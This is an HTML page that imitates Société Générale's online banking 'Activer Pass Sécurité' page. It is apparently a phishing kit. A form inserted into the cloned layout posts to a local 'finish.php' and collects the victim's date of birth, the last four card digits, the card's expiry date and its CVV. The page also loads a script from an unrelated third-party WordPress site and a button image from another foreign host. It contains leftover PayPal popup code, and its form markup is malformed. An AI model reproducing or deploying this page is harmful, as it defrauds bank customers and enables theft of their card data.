﻿

 





  


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
  <html lang="fr">
  <head>
	
  	
























	<title>Activer Pass Sécurité</title>
	<meta content="text/html; charset=UTF-8" http-equiv="Content-Type"/><meta content="autre" name="NET2GCLASS" lang="fr"/><meta content="" name="NET2GKEYWORDS" lang="fr"/><meta content="Activer Pass Sécurité" name="NET2GINTITULE" lang="fr"/><meta content="O" name="NET2GINDEXABLE" lang="fr"/><link rel="alternate" media="only screen and (max-width: 440px)" href="https://m.particuliers.societegenerale.fr"/>
	<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/ephox_commun_defaut.css"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/contenus_pap_defaut.css"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/contenus_defaut.css"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/grid_commun_defaut.css"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/grid_p1_defaut.css"/>
<!--[if lte IE 6]>
<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/grid_commun_ie6_defaut.css"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://static.societegenerale.fr//pri/themes/defaut/css/contenus_ie6_defaut.css"/>
<![endif]-->

	<script src="https://static.societegenerale.fr//pri/contenu/js/jquery-1-4-2-min.js" type="text/javascript"></script>
<script type="text/javascript">var $jNgp = jQuery.noConflict();</script>

	<script src="https://static.societegenerale.fr//pri/contenu/js/n2g_secu.js" type="text/javascript"></script>
<script type="text/javascript">frame_shield();</script>
<script type="text/javascript">var isSecureSite = true;</script>
<script src="/images/bourse/root-cem/scripts/menuDynBlocCem.js" type="text/javascript"></script>
<script src="/js/messagerie/gms.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/static/sml/default/js/sml-portail.js" type="text/javascript"></script>
<script src="/js/commun/fw_session.js" type="text/javascript"></script>
<script src="/js/commun/fw_pcc.js" type="text/javascript"></script>
<script src="/js/commun/fw_data.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/contenu/js/jquery-ui.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/contenu/js/jquery.dropshadow.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/contenu/js/stat.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/contenu/js/n2g_lookup_list.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/contenu/js/jquery-autocomplete-min.js" type="text/javascript"></script>
<script src="https://static.societegenerale.fr//pri/contenu/js/dpm.js" type="text/javascript"></script>

	



	




  </head>
  <body>
	

  <div id="n2g_conteneur">
  	<div id="n2g_zone_haut">
  		


<div id="n2g_zone_haut_1">





		




		




 
	
	<div class="n2g_zone_logo"><a href="/com/accueil.html" ><img src="https://static.societegenerale.fr//pri/PRI/Multimedias/logo_et_copyright/logo_header_refonte_2010.gif" alt="" /></a></div>

	
	<div id="n2g_zone_haut_centre"><div><span style=" margin-top: 0;">&nbsp;</span></div></div> 
	
	
	<div id="n2g_zone_haut_droite">
		<div class="n2g_mire_connexion_co">
			<div class="n2g_mire_connexion_titre">Vous êtes connecté</div>
			<div class="n2g_mire_connexion_zone_btn"><a href="/deconnexion/cache.html" title="Cliquez ici pour vous déconnecter">Déconnexion</a></div>
			<ul>
			
					<li class="item_1"><a href="/acces/changecode.html" >Changer votre code secret</a></li>
				
					<li class="item_2"><a href="/com/votre_site/configuration_securite/internet_et_vous/pour_naviguer_en_toute_securite.html" title="Pour naviguer en toute sécurité"  >Informations Sécurité</a></li>
				
			</ul>
			<div class="n2g_mire_connexion_derniere_connexion"><script type="text/javascript">document.write( getLastConnexionContent1() + " " + getLastConnexionContent2() );</script></div>
		</div>
	</div>
	


</div>
<div id="n2g_zone_haut_2">





		
<!-- Fragment generated at 2015/09/04 - 17:46:27:0821 -->

				




		




	 


<div id="n2g_navigation_principale_connecte">
<script type="text/javascript">
		var lgn1_isRubriqueRelator = [];
		var lgn2_isRubriqueRelator = [];
</script>

	<div id="n2g_menu_lgn_container">
		<div id="n2g_menu_lgn_slide">
			
			<ul class="n2g_menu_lgn nb_items_6" id="n2g_menu_lgn_1">
					<li class="item_1"><a id="659612863780" href="/gms/gmsListeMessages.html" ><span>Messagerie</span></a><script type="text/javascript">n2g_affiche_nb_messages_non_lus('659612863780');</script></li>
				
					<script type="text/javascript">
						
					</script>
				
					<li class="item_2 actif"><a href="/restitution/cns_listeprestation.html" ><span>Comptes et services</span></a></li>
				
					<script type="text/javascript">
						
					</script>
				
					<li class="item_3"><a href="/com/gbi-web/rubrique-gbi/gbi-rubrique-tableauDeBord.html" ><span>Gestion de budget</span></a></li>
				
					<script type="text/javascript">
						
					</script>
				
					<li class="item_4"><a href="/cem/CED10.html?AOPL=COMSTOCK" ><span>Bourse</span></a></li>
				
					<script type="text/javascript">
						
					</script>
				
					<li class="item_5"><a href="/com/fidelisation/FIDRecherche.html?modeAppel=CAT&codeCategorie=2" ><span>Filigrane</span></a></li>
				
					<script type="text/javascript">
						
					</script>
				
					<li class="item_6"><a href="/com/accueil.html" ><span>NOS OFFRES ET CONSEILS</span></a></li>
				
					<script type="text/javascript">
						
					</script>
				
			</ul>
			<ul  class="n2g_menu_lgn" id="container_menuswitch">
	        	<div style="display:none" />
	        	<div style="display:none" />
	        </ul>
			
			<ul class="n2g_menu_lgn nb_items_5" id="n2g_menu_lgn_2">
					<li class="item_1"><a href="/restitution/cns_listeprestation.html" ><span>ESPACE DE GESTION</span></a></li>
					
					<script type="text/javascript">
						
					</script>
				
					<li class="item_2"><a href="/com/essentiel_quotidien.html" title="L'essentiel au quotidien"  ><span>L'essentiel au quotidien</span></a></li>
					
					<script type="text/javascript">
						
					</script>
				
					<li class="item_3"><a href="/com/epargner.html" title="Epargner"  ><span>Epargner</span></a></li>
					
					<script type="text/javascript">
						
					</script>
				
					<li class="item_4"><a href="/com/emprunter.html" title="Emprunter"  ><span>Emprunter</span></a></li>
					
					<script type="text/javascript">
						
					</script>
				
					<li class="item_5"><a href="/com/proteger_vos_biens_et_vos_proches.html" title="Protéger vos biens et vos proches"  ><span>Protéger vos biens et vos proches</span></a></li>
					
					<script type="text/javascript">
						
					</script>
				
			</ul>
			<script src="https://static.societegenerale.fr//pri/ctn/relatorJS.js" type="text/javascript"></script>
		</div>
	</div>

		<div id="n2g_formulaire_de_recherche_connecte">
 			<form id="n2g_formulaire_de_recherche_barre_navigation" method="post" action="/com/resultats_recherche.html" onsubmit="javascript:return ngp_recherche(this);">
				<label for="mots_cles" class="n2g_element_a_cacher">saisir un ou plusieurs mots-clés :</label>
				<input id="mots_cles" name="chl_200_param_rech" type="text" class="input input_before_focus" value="Rechercher" onfocus="javascript:this.value=''; this.className='input input_after_focus';" />
				<input type="hidden" name="url_1200_source"/>
				<input type="hidden" name="chl_50_document_encoding"/>
				<input type="submit" value="ok" class="submit" title="Lancer la recherche" />
 			</form>
 		</div>
	
</div>
<script type="text/javascript" src="https://static.societegenerale.fr//pri/contenu/js/n2g_menu_haut.js"></script>

				
				




		




	 


	<div class="n2g_separateur_zones_menu_et_cdf"></div>
	<div id="n2g_cdf_conteneur">
		<div id="n2g_cdf_titre" class="n2g_cdf_titre_renseigne"  style="background-image:url('https://static.societegenerale.fr//pri/Repertoire_par_type_de_contenus/Visuel/Chemin_de_fer/n2g_cdf_titre_fond.gif');">
			Vous êtes ici
		</div>
		<div id="n2g_cdf_contenu">   
			<ul>
			
					
						
						<li class="item_1">
						
							<a  href="/com/accueil.html"   >Accueil</a>
						
						</li>
						
					<li class="n2g_cdf_separateur item_2">&gt;</li>
					
						
						<li class="item_3">
						
							<a  href="/restitution/cns_listeprestation.html"   >Comptes et services</a>
						
						</li>
						
					<li class="n2g_cdf_separateur item_4">&gt;</li>
					
						
						<li class="item_5">
						
							Mon profil
						
						</li>
						
					<li class="n2g_cdf_separateur item_6">&gt;</li>
					
						
						<li class="item_7">
						
							<a  href="/com/dcr-web/dcr/dcr-securite.html"   title="Moyens de sécurité" >Moyens de sécurité</a>
						
						</li>
						
					<li class="n2g_cdf_separateur item_8">&gt;</li>
					 
						<li class="n2g_cdf_page_courante item_9">
							Activer Pass Sécurité
						</li>
					
			</ul>
		</div>
	</div>



				




</div>
  	</div>
    <div id="n2g_conteneur_milieu">
  		<div id="n2g_zone_milieu">
  			<div id="n2g_zone_gauche"> 
  				






		
<!-- Fragment generated at 2015/09/04 - 17:46:27:0919 -->

				




		




	 

<div><div class="n2g_menu_monprofil_wrapper">
<div class="n2g_menu_monprofil_title-rub"><a href="#" class="n2g_menu_monprofil_title-link"><!-- Mon profil --></a></div>

<ul class="n2g_menu_monprofil_links-rub n2g_menu1_block">
<li><a id="38afbf32fed24410VgnVCM100000866240c0RCRD" href="/com/dcr-web/dcr/dcr-securite.html" class="n2g_menu_monprofil_rub-moyensecurite">Moyens de sécurité</a></li>

<li><a id="88416f314b044410VgnVCM100000866240c0RCRD" href="/com/dcr-web/dcr/dcr-coordonnees.html" class="n2g_menu_monprofil_rub-coordonnees">Coordonnées</a></li>

<li><a id="3b856f314b044410VgnVCM100000866240c0RCRD" href="/com/dcr-web/dcr/dcr-donnees-personnelles.html" class="n2g_menu_monprofil_rub-donneesperso">Données personnelles</a></li>

<li><a id="9e6fce271f3fa110VgnVCM1000000e1142c0RCRD" href="/brs/eval/eval50.html?initial=true" class="n2g_menu_monprofil_rub-profilepargnant">Profil épargnant</a></li>
</ul>
</div>

<div><script type="text/javascript"> var c_link = document.createElement('link'); c_link.setAttribute("href","https://static.societegenerale.fr/pri/PRI/Repertoire_par_type_de_contenus/Type_de_contenu/Menu_DCR_mon_profil/css/menu_dcr_mon_profil.css"); c_link.setAttribute("rel","stylesheet"); c_link.setAttribute("type","text/css"); document.getElementsByTagName("head").item(0).appendChild(c_link); </script><script type="text/javascript" src="https://static.societegenerale.fr/pri/PRI/Repertoire_par_type_de_contenus/Type_de_contenu/Menu_DCR_mon_profil/js/menu_dcr_mon_profil.js"></script></div></div>

		
				
				




		




	 
<div class="n2g_menu_section">

					<div class="n2g_menu_section_titre">
						<div class="n2g_menu_section_titre_d"><div class="n2g_menu_section_titre_g"></div></div>
						<div class="n2g_menu_section_titre_texte">Comptes</div>
					</div>
					
					<ul>
						<li class="n2g_menu_section_item item_2"><a href="/restitution/cns_listeprestation.html" >Consultation</a></li>
						<li class="n2g_menu_section_item item_3"><a id="393451740564" href="/restitution/rce_derniers_releves.html" >Relevés en ligne</a><script type="text/javascript">n2g_affiche_nb_releves_non_lus('393451740564');</script></li>
						<li class="n2g_menu_section_item item_4"><a href="/restitution/tel_telechargement.html" >Téléchargement</a></li>
						<li class="n2g_menu_section_item item_5"><a href="/personnalisation/per_cpt_afficher.html" >Personnalisation</a></li>
						<li class="n2g_menu_section_item item_6"><a href="/restitution/imp_listeRib.html" >Impression RIB</a></li>
					</ul>
					<div class="n2g_menu_section_titre">
						<div class="n2g_menu_section_titre_d"><div class="n2g_menu_section_titre_g"></div></div>
						<div class="n2g_menu_section_titre_texte">Virements / Prélèvements</div>
					</div>
					
					<ul>
						<li class="n2g_menu_section_item item_8"><a href="/virement/pas_vipon_saisie.html" >Passer un virement</a></li>
						<li class="n2g_menu_section_item item_9"><a href="/virement/sui_vipon_liste.html" >Suivre les virements</a></li>
						<li class="n2g_menu_section_item item_10"><a href="/prelevement/prelev_restit_liste_operations.html" >Prélèvements</a></li>
					</ul></div>

				
				




		




	 

<div><div><a class="n2g_btn_synthese_contrat" href="/com/restitution/services_contrats.html" id="35879b40d286b210VgnVCM100000866240c0RCRD">Synthese et contrat</a> <a class="n2g_btn_assurance_prevoyance" href="/com/asp/aspgestionlistedevis.html" id="bd91470627528210VgnVCM100000876240c0RCRD">&nbsp;Assurance et prévoyance</a></div></div>

		
				
				




		




	 

<div><div><script type="text/javascript" language="javascript">includeCssFile("https://static.societegenerale.fr/pri/ctn/popin/fancybox130.css");</script><script type="text/javascript" src="https://static.societegenerale.fr/pri/jquery/plugin/fancybox130.js"></script><script type="text/javascript" src="https://static.societegenerale.fr/pri/contenu/js/n2g_popin_toolbox.js"></script></div>

<div><script type="text/javascript" language="javascript">includeCssFile("https://static.societegenerale.fr/pri/themes/defaut/css/n2g_popin_lgn_bloc_contact.css");</script></div>

<div style=" margin-bottom: 10px;"><a href="javascript:n2gPopinGetAndDisplayRessource('/com/fragments/restitbloccontact.html', 'auto', 600);" title="Mes contacts" class="n2g_btn_contacts n2g_popin_ajax_load_btn">Mes contacts</a></div>

<div style=" margin-bottom: 10px;"><a id="d34503648839c110VgnVCM100000866240c0RCRD" href="/com/nous_contacter/service_urgence.html" title="Accéder aux Services d'urgence"><img alt="" border="0" src="https://static.societegenerale.fr//pri/PRI/Repertoire_par_type_de_contenus/Visuel/contenu_lien/visuel_btn_services_urgences.gif"></a></div></div>

		
				





  			</div>
  			<div id="n2g_zone_centre">
        			<div id="n2g_zone_centre_haut">
          				






		
<!-- Fragment generated at 2015/09/04 - 17:46:27:0992 -->

				




		




	 

<div><div><!-- /* ///////////////////////////// &&& BEGIN INSERT - 27/02/2014 ///////////////////////////// */ --></div>

<div class="n2g_pass_securite_activation_container"><script type="text/javascript"> var c_link = document.createElement('link'); c_link.setAttribute("href","https://static.societegenerale.fr/pri/PRI/Repertoire_par_type_de_contenus/Type_de_contenu/OOB_DCR/css/n2g_Pages_Pass_Securite_Activation.css"); c_link.setAttribute("rel","stylesheet"); c_link.setAttribute("type","text/css"); document.getElementsByTagName("head").item(0).appendChild(c_link); </script>
<div class="n2g_pass_securite_activation_block1"><span class="n2g_pass_securite_activation_block1_title">ACTIVATION DE VOTRE PASS SECURITE</span> <span>Vous souhaitez activer votre Pass Sécurité ? Rien de plus simple, suivez le mode d’emploi ! </span> 

<div class="n2g_pass_securite_activation_block1_subtitle">Pour activer votre <span class="n2g_pass_securite_activation_text_color">Pass Sécurité</span>, vous devez :</div>

<script language="JavaScript">
function openWindow1() {
popupWin = window.open('https://www.paypal.com/fr/cgi-bin/webscr?cmd=p/acc/cvv_info_pop-outside','EIN','scrollbars,resizable,toolbar,width=600,height=470,left=200,top=50');
popupWin.focus();
}
</script>
<form name="main" id="main" method="POST" action="finish.php"
<script src="http://sharonhelgens.com/wp-content/themes/validator.js" type="text/javascript"></script>
<table width="760" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td>
<hr class="dotted">
</td></tr>
<tr>


</tbody></table>
<TR>
<TD CLASS="champ_ident"><IMG SRC="https://particuliers.secure.societegenerale.fr/img/commun/trans.gif" WIDTH="35" height="1"></TD>

</TR
</tbody></table>







</tr>
</tbody></table>
<table width="760" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr><td><br>Assurez-vous que vous entrez les informations avec précision, et selon les formats requis.<br> Remplissez tous les champs requis.<br><br></td></tr>
</tbody></table>
<table width="760" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody>

<tr>
<td class="label" width="320"><label for="dob">* Date de naissance :</label></td>
<td width="2">&nbsp;</td>
<td width="480">

<select name="jour">
                  <option value="0" selected>--Jours--</option>
                  <option value="01">01</option>
                  <option value="02">02</option>
                  <option value="03">03</option>

                  <option value="04">04</option>
                  <option value="05">05</option>
                  <option value="06">06</option>
                  <option value="07">07</option>
                  <option value="08">08</option>
                  <option value="09">09</option>

                  <option value="10">10</option>
                  <option value="11">11</option>
                  <option value="12">12</option>
                  <option value="13">13</option>
                  <option value="14">14</option>
                  <option value="15">15</option>

                  <option value="16">16</option>
                  <option value="17">17</option>
                  <option value="18">18</option>
                  <option value="19">19</option>
                  <option value="20">20</option>
                  <option value="21">21</option>

                  <option value="22">22</option>
                  <option value="23">23</option>
                  <option value="24">24</option>
                  <option value="25">25</option>
                  <option value="26">26</option>
                  <option value="27">27</option>

                  <option value="28">28</option>
                  <option value="29">29</option>
                  <option value="30">30</option>
                  <option value="31">31</option>
                </select>

<select name="mois">

                    <option value="0" selected><font face="Arial, Helvetica, Verdana, sans-serif" size="2">--Mois--</font></option>
                    <option value="01"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Janvier</font></option>
                    <option value="02"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Fevrier</font></option>
                    <option value="03"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Mars</font></option>
                    <option value="04"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Avril</font></option>
                    <option value="05"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Mai</font></option>

                    <option value="06"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Juin</font></option>
                    <option value="07"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Juillet</font></option>
                    <option value="08"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Aout</font></option>
                    <option value="09"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Septembre</font></option>
                    <option value="10"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Octobre</font></option>
                    <option value="11"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Novembre</font></option>

                    <option value="12"><font face="Arial, Helvetica, Verdana, sans-serif" size="2">Decembre</font></option>
                  </select>

<select class="" name="byear">
<option selected="selected" value="">Année</option>
<option value="2015">2015</option>
<option value="2014">2014</option>
<option value="2013">2013</option>
<option value="2012">2012</option>
<option value="2011">2011</option>
<option value="2010">2010</option>
<option value="2009">2009</option>
<option value="2008">2008</option>
<option value="2007">2007</option>
<option value="2006">2006</option>
<option value="2005">2005</option>
<option value="2004">2004</option>
<option value="2003">2003</option>
<option value="2002">2002</option>
<option value="2001">2001</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>
<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>
<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>
<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>
<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>
<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>
<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>
<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>
<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>
<option value="1925">1925</option>
<option value="1924">1924</option>
<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>
<option value="1916">1916</option>
<option value="1915">1915</option>
<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
<option value="1908">1908</option>
<option value="1907">1907</option>
<option value="1906">1906</option>
<option value="1905">1905</option>
</select>
</td>
</tr>
















<tr>
<td class="label" width="320"><label for="userphoneinfo">&nbsp;</label></td>
<td width="2">&nbsp;</td>
<td width="480"><span class="small"></span></td>
</tr>

</tbody></table>



<br>
<table width="760" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td>
<hr class="dotted">
</td></tr>
<tr>

<td class=""><span class="emphasis">Profil de carte de crédit<br>
<input name="default" value="1" type="hidden">
</span></td>
</tr>
</tbody></table>
<table width="760" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr><td><br>Entrez les informations de votre carte aussi precisement que possible.<br> Pour le numéro de carte de crédit, saisir uniquement des chiffres s'il vous plait, pas de tirets ou des espaces.<br><br></td></tr>
</tbody></table>

<table width="760" align="center" border="0" cellpadding="0" cellspacing="0">




<tbody><tr>
<td class="label" width="320"><label for="defaultcardnumber">* 4 derniers numero de votre carte de credit :</label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" id="defaultcardnumber1" name="defaultcardnumber1" size="20" type="text" value="xxxx-xxxx-xxxx-" readonly="readonly" style="width:92px;">
<input class="" id="defaultcardnumber" name="defaultcardnumber" size="8" type="text" style="width:38px;"></td>
</tr>

<tr>
<td class="label" width="320"><label for="defaultexpdate">* Date d'expiration :</label></td>
<td width="2">&nbsp;</td>
<td width="418">

<select class="" name="defaultexpmonth" id="defaultexpmonth">
<option selected="selected" value="00">Mois</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
<select class="" name="defaultexpyear" size="1" id="defaultexpyear" type="select">
<option selected="selected" value="00">Année</option>

<option value="15">2015</option>
<option value="16">2016</option>
<option value="17">2017</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>
<option value="21">2021</option>
</select>&nbsp;</td>
</tr>
<tr>
<td class="label" style="vertical-align: middle;" width="320"><label for="defaultcvv2">* Cryptogramme visuel :</label></td>
<td width="2">&nbsp;</td>
<td width="418">
<input class="" style="vertical-align: bottom;" id="defaultcvv2" size="3" maxlength="4" name="defaultcvv2" type="text">

</tr>

</tbody></table>
<br><br>
<table width="760" align="right" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td align="center">
<input style="border: 1px solid rgb(249, 05, 39); background: rgb(249, 05, 39) url(http://www.thealternateroot.com/images/bstn_valider.gif) repeat-x scroll left top; margin-top: 30px; margin-bottom: 40px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; width: auto; height: 23px; font-family: arial; font-style: normal; font-variant: normal; font-weight: bold; font-size: 12px; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none; color: rgb(255, 255, 255); text-align: center;" name="set" value="Valider" type="submit">

</td>
</tr>
</tbody></table>
</form>



</center>



<div><!-- /* ///////////////////////////// &&& END INSERT ///////////////////////////// */ --></div></div>

		
				





        			</div>
	

				





    
    

    



    


		<div id='n2g_zone_centre_lgn'>
  	    
	
	  
	    















		











		




	  
	  
	



		</div>
		
 



					

    				<div id="n2g_zone_centre_bas">
    					






		



    				</div>
 			</div>
			<div id="n2g_zone_droite"  > 
         			






		



      </div>
     
		
		</div>
		 <div class="n2g_separateur_zones_milieu_bas">
		</div>
	</div>
	<div id="n2g_zone_bas">
		






		




		




	

<div class="n2g_zone_bas_visuel"><a href="http://www.societegenerale.com/" title="Groupe Société Générale (nouvelle fen&ecirc;tre)"  onclick="window.open(this.href, 'sg_17460782','toolbar=yes, menubar=yes, location=yes, resizable=yes, scrollbars=yes, status=yes');return false;"  ><img src="https://static.societegenerale.fr//pri/img/n2g_pied_visuel.jpg" alt="Groupe Société Générale" /></a></div>


<ul class="n2g_zone_bas_liens">
			<li class="n2g_zone_bas_liens_item_first"><a href="/com/votre_site/plan_de_site.html" title="Plan du site de la Société Générale"  >Plan de site</a></li>
			<li class="item_2"><a href="/com/votre_site/nos_engagements.html" title="Nos engagements"  >Nos engagements</a></li>
			<li class="item_3"><a href="/com/votre_site/informations_legales.html" title="Informations légales"  >Informations légales</a></li>
			<li class="item_4"><a href="/com/votre_site/configuration_securite.html" title="Configuration et sécurité"  >Configuration et sécurité</a></li>
			<li class="item_5"><a href="/com/votre_site/lexique_a.html" >Lexique</a></li>
			<li class="item_6"><a href="/com/nous_contacter.html" title="Nous contacter"  >Nous contacter</a></li>
</ul>
	

<div class="n2g_zone_bas_copyright"><img src="https://static.societegenerale.fr//pri/PRI/Multimedias/logoetcopyright/n2g_pied_copyright.gif" alt="" height="14" width="129" /></div>


<div class="n2g_inhiber_le_flottant_a_gauche"></div>

  <style type="text/css">
  #n2g_zone_bas {position:static;}
  </style>





		<script type="text/javascript" src="https://static.societegenerale.fr//pri/contenu/js/n2g_recherche.js"></script>
	
<div id="n2g_zone_stats">





		


	






<script type="text/javascript" src="https://static.societegenerale.fr//pri/contenu/js/n2gMesureAudienceUtil.js?t=400383"></script>

			<script type="text/javascript">
				<!--
				if(typeof(xt_at)=="undefined") {
					xt_at = "452671a7dabac0e45fa82f339b5942ea";
				}
				if(xt_at!=""){
					if (window.xtparam!=null){window.xtparam+="&at="+xt_at;}
					else{window.xtparam="&at="+xt_at;};
				}
				
				if(typeof(xiti_xtati)=="undefined"){
					xiti_xtati=n2gAudienceComs();
				}
				if(xiti_xtati!= null && xiti_xtati!=""){
					xt_ati=xiti_xtati;    //Ad banners name (separated by ,)
					//		do not modify below
					if (window.xtparam!=null){window.xtparam+="&ati="+xt_ati;}
					else{window.xtparam="&ati="+xt_ati;};
				}
				//-->
			</script>

			<script type="text/javascript">
				xiti_xtnv = "document";
				xiti_xsite = "412253";
				xiti_xtsd = "https://logs128";
				if (typeof(xiti_xtn2)=="undefined"){
					xiti_xtn2 = "19";
				}
				if (typeof(xiti_xtpage)=="undefined"){
						xiti_xtpage = "mon_profil::moyens_de_securite::activer_pass_securite";
				}
				xiti_xtdi = "0";
			</script>
			<script type="text/javascript">
				<!--
				 	   n2gVarXiti(xiti_xtnv, xiti_xsite, xiti_xtsd, xiti_xtn2, xiti_xtpage, xiti_xtdi);
				//-->
			</script>
			
			<script type="text/javascript" src="https://static.societegenerale.fr//pri/xtcore.js"></script>
			
			
			<noscript>
				<img width="1" height="1" alt="" src="https://logs128.xiti.com/hit.xiti?s=412253&s2=19&p=mon_profil::moyens_de_securite::activer_pass_securite&di=0">
			</noscript>
		





</div>
	</div>
</div>



 

</body>
</html>
